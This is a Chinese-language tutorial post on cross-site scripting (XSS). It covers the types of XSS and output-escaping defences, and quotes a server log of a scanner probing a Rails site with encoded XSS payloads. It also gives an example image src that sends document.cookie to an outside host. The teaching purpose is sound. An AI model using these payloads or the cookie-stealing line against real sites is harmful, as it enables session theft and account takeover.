跨站腳本攻擊(xss)理解
一 概念javascript
攻擊者不直接攻擊受害者,而是利用受害者登錄的網站中的漏洞,對受害者進行攻擊。html
二 危害前端
因爲js自己的限制,並不能直接對用戶的電腦形成侵害,可是能夠:vue
1. 獲取用戶的storage,cookie;java
2. 發送任意內容的請求,會形成用戶身份信息泄漏;react
3. 修改dom結構;惡意腳本可以獲取用戶敏感信息、監聽鍵盤事件、建立惡意表單、將用戶信息提交到另外一臺服務器;數據庫
三 原理瀏覽器
基本就是攻擊者利用網站,在用戶的瀏覽器上執行惡意js腳本安全
四 主要分爲三種類型ruby
1. 持久型
2. 反射型
3. 基於dom型
## 持久型
評論/留言/用戶資料/暱稱等等,可被其餘用戶訪問到的信息,若是直接經過接口提交的評論內容爲js腳本,後臺直接存入數據庫,其餘用戶經過列表接口獲取到這條評論的時候,會直接執行js腳本,或者圖片的src設置成`src=http://demo.com?cookie=document.cookie`等等。
![圖解xss]
## 反射型
誘導用戶點擊惡意連接(配合url縮短技術),分享連接,入羣連接等等;
## 基於dom型
一樣經過url,操做dom節點;
五 辦法
**不能信任用戶的全部輸入**。
1 須要把來自服務端全部須要渲染的數據進行html轉義。
[附轉義映射表]
http://tool.oschina.net/commons?type=2
處理後,瀏覽器就會將標籤做爲文字渲染,而不是標籤。
2 好的是如今用的前端框架(angular,react,vue...)通常都會默認作安全字符串處理,如[angular文檔所介紹的](https://angular.cn/guide/template-syntax):
五 附
下面是一個疑似阿里雲盾掃描的檢驗網站安全的例子:
[有人試圖對個人開發服務器爆破](https://ruby-china.org/topics/30350)
能夠看到其中有這麼一段記錄:
```
Started GET "/providers/1/comments?page=javascript:alert(1987)" for 121.42.0.17 at 2016-06-23 05:20:00 +0800
Started GET "/providers/1/comments?page=javascript%3Aalert%281987%29" for 121.42.0.17 at 2016-06-23 05:20:02 +0800
Started GET "/providers/1/comments?page=javascript%253Aalert%25281987%2529" for 121.42.0.17 at 2016-06-23 05:20:04 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3Cimg/src/onerror=alert()%3E" for 121.42.0.17 at 2016-06-23 05:20:05 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3Cimg%2fsrc%2fonerror%3Dalert%28%29%3E" for 121.42.0.17 at 2016-06-23 05:20:07 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253Cimg%252fsrc%252fonerror%253Dalert%2528%2529%253E" for 121.42.0.17 at 2016-06-23 05:20:08 +0800
Started GET "/providers/1/comments?page=%27%22+onmouseover=alert()+d=%27%22" for 121.42.0.17 at 2016-06-23 05:20:14 +0800
Started GET "/providers/1/comments?page=%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22" for 121.42.0.17 at 2016-06-23 05:20:15 +0800
Started GET "/providers/1/comments?page=%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522" for 121.42.0.17 at 2016-06-23 05:20:17 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E" for 121.42.0.17 at 2016-06-23 05:20:20 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E" for 121.42.0.17 at 2016-06-23 05:20:22 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E" for 121.42.0.17 at 2016-06-23 05:20:25 +0800
Started GET "/providers/1/comments?page=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" for 121.42.0.17 at 2016-06-23 05:20:34 +0800
Started GET "/providers/1/comments?page=amF2YXNjcmlwdDpwcm9tcHQoMTExKTt4" for 121.42.0.17 at 2016-06-23 05:20:38 +0800
Started GET "/providers/1/'%22+onmouseover=alert()+d='%22" for 121.42.0.17 at 2016-06-23 05:20:49 +0800
Started GET "/providers/1/%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22" for 121.42.0.17 at 2016-06-23 05:20:50 +0800
Started GET "/providers/1/%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522" for 121.42.0.17 at 2016-06-23 05:20:51 +0800
Started GET "/providers/1/comments/'%22+onmouseover=alert()+d='%22/?page=2" for 121.42.0.17 at 2016-06-23 05:20:52 +0800
Started GET "/providers/1/comments/%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22/?page=2" for 121.42.0.17 at 2016-06-23 05:20:53 +0800
Started GET "/providers/1/comments/%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522/?page=2" for 121.42.0.17 at 2016-06-23 05:20:55 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Ciframe%20onload=alert()%3E" for 121.42.0.59 at 2016-06-23 05:20:57 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Cimg%20src=x%20onerror=prompt()%3E" for 121.42.0.57 at 2016-06-23 05:21:03 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Csvg%20onload=prompt()%3E" for 121.42.0.56 at 2016-06-23 05:21:05 +0800
Started GET "/providers/1/comments?page=2" for 121.42.0.58 at 2016-06-23 05:21:10 +0800
Started GET "/providers/1/'%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E" for 121.42.0.17 at 2016-06-23 05:21:16 +0800
Started GET "/providers/1/%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E" for 121.42.0.17 at 2016-06-23 05:21:21 +0800
Started GET "/providers/1/%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E" for 121.42.0.17 at 2016-06-23 05:21:26 +0800
Started GET "/providers/1/comments/'%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E/?page=2" for 121.42.0.17 at 2016-06-23 05:21:39 +0800
Started GET "/providers/1/comments/%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E/?page=2" for 121.42.0.17 at 2016-06-23 05:21:46 +0800
Started GET "/providers/1/comments/%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E/?page=2" for 121.42.0.17 at 2016-06-23 05:22:11 +0800
```
這些記錄都是對這個站點進行xss檢測。
- 1. XSS跨站腳本攻擊
- 2. 跨站腳本攻擊XSS
- 3. XSS 跨站腳本攻擊
- 4. XSS-跨站腳本攻擊
- 5. xss跨站腳本攻擊
- 6. 跨站腳本攻擊—XSS
- 7. 跨站腳本攻擊(xss)
- 8. XSS(跨站腳本攻擊)
- 9. 跨站腳本攻擊(XSS)
- 10. XSS攻擊(跨站腳本攻擊)
- 更多相關文章...
- • Swift 下標腳本 - Swift 教程
- • 服務端腳本 指南 - 網站建設指南
- • PHP Ajax 跨域問題最佳解決方案
- • Docker 清理命令
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. XSS跨站腳本攻擊
- 2. 跨站腳本攻擊XSS
- 3. XSS 跨站腳本攻擊
- 4. XSS-跨站腳本攻擊
- 5. xss跨站腳本攻擊
- 6. 跨站腳本攻擊—XSS
- 7. 跨站腳本攻擊(xss)
- 8. XSS(跨站腳本攻擊)
- 9. 跨站腳本攻擊(XSS)
- 10. XSS攻擊(跨站腳本攻擊)